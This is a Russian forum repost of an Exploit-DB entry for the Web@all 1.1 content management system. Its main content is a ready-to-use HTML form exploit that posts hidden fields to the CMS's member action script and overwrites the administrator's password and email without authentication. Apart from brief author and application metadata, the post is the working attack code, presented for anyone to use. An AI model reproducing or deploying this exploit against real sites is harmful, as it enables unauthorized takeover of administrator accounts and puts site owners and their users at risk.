Exploit Web@all 1.1 - Remote Admin Settings Change

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
15837
Проверка EDB
  1. Пройдено
Автор
GIUSEPPE D'INVERNO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2010-12-27
Код:
===========================================
Web@all <= 1.1 Remote Admin Settings Change
===========================================

Author___: giudinvx
Email____: <giudinvx[at]gmail[dot]com>
Date_____: 27/12/2010
Site_____: http://www.giudinvx.altervista.org/
--------------------------------------------------------
Application Info:
web@all 1.1
web@all is a CMS which is not similar to general CMS,
you can build it easyly by yourself.
www.webatall.com
--------------------------------------------------------

==============[[ -Exploit Code- ]]==============

<html>
<form method="post" enctype="multipart/form-data"
action="[localhost]mem/action.php" name="f1">
Change Admin user, password and email.<br/>
Password<input type="text" value="" name="password"><br/>
Password<input type="text" value="" name="answer"><br/>
Email<input type="text" value="" name="email">
<input type="hidden" value="Admin" name="nickname">
<input type="hidden" value="" name="question">
<input type="hidden" value="" name="sign">
<input type="hidden" value="" name="person[firstname]">
<input type="hidden" value="" name="person[lastname]">
<input type="hidden" value="" name="person[country]">
<input type="hidden" value="" name="person[province]">
<input type="hidden" value="" name="person[city]">
<input type="hidden" value="" name="person[address]">
<input type="hidden" value="" name="person[zip]">
<input type="hidden" value="" name="person[mobile]">
<input type="hidden" value="" name="person[phone]">
<input type="hidden" value="" name="person[other]">
<input type="hidden" value="member" name="_lib">
<input type="hidden" value="member" name="_file">
<input type="hidden" value="person" name="memtype">
<input type="hidden" value="do_edit" name="_act">
<input type="submit" value="Submit">
</form>
</html>
 
Источник
www.exploit-db.com

Похожие темы